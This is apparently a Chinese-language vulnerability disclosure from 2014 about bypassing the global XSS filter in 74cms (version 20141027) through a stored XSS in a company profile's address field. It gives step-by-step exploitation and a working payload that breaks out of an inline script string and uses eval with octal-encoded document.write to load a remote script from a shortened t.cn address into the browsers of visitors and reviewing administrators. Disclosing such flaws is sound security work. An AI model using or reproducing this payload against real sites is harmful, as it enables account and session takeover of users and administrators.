### 简要描述:
74cms(20141027)全局xss防护考虑不完善可被绕过
### 详细说明:
防护代码就不贴出来了,
代码中只考虑了 新建标签的情况 或者在a img之类的标签节点中。
但是没有考虑下面这种的情况
```
<script>
Var xx=”qiyeid”;
</script>
```
这样的话,我们就可以这样利用
```
<script>
Var xx=”qiyeid”;eval(‘documnet.write(js 8进制编码)’)//
</script>
```
### 漏洞证明:
正好找到了一处存储xss。
直接贴利用方法
先来注册一个企业帐号
[<img src="https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/02001455c8a26641d8b83991b7489f0e6aa3ae8c.png)
http://localhost/74/user/company/company_info.php?act=company_profile
重点利用在详细地址这,不过我们需要设置一下input的长度大一点 。默认长度为80,但是数据库中为250。
然后插上我们的代码。
```
",opts);eval('document.write("\74\163cript/\163rc=//t.cn/*****\76\74/\163cript\76")')//
```
[<img src="https://images.seebug.org/upload/201411/0200151847b143ae676fcf9132addf75dc703177.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/0200151847b143ae676fcf9132addf75dc703177.png)
保存
然后再去地图标注一下企业的位置,
http://localhost/74/user/company/company_info.php?act=company_map_set
[<img src="https://images.seebug.org/upload/201411/020015396a13c1696db2494876e15abdb7036104.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/020015396a13c1696db2494876e15abdb7036104.png)
这个位置就随意了。
然后等用户查看企业时 或者管理员在后台审核企业时
[<img src="https://images.seebug.org/upload/201411/020015569a2ccd5baf86e9e53d647a51be669203.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/020015569a2ccd5baf86e9e53d647a51be669203.png)
会打开如下url http://localhost/74/company/company-show.php?id=1(前台也可见,为企业的展示页面)
[<img src="https://images.seebug.org/upload/201411/02001611738302cb9817cbc36607815af9922c81.png" alt="图片5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/02001611738302cb9817cbc36607815af9922c81.png)
暂无评论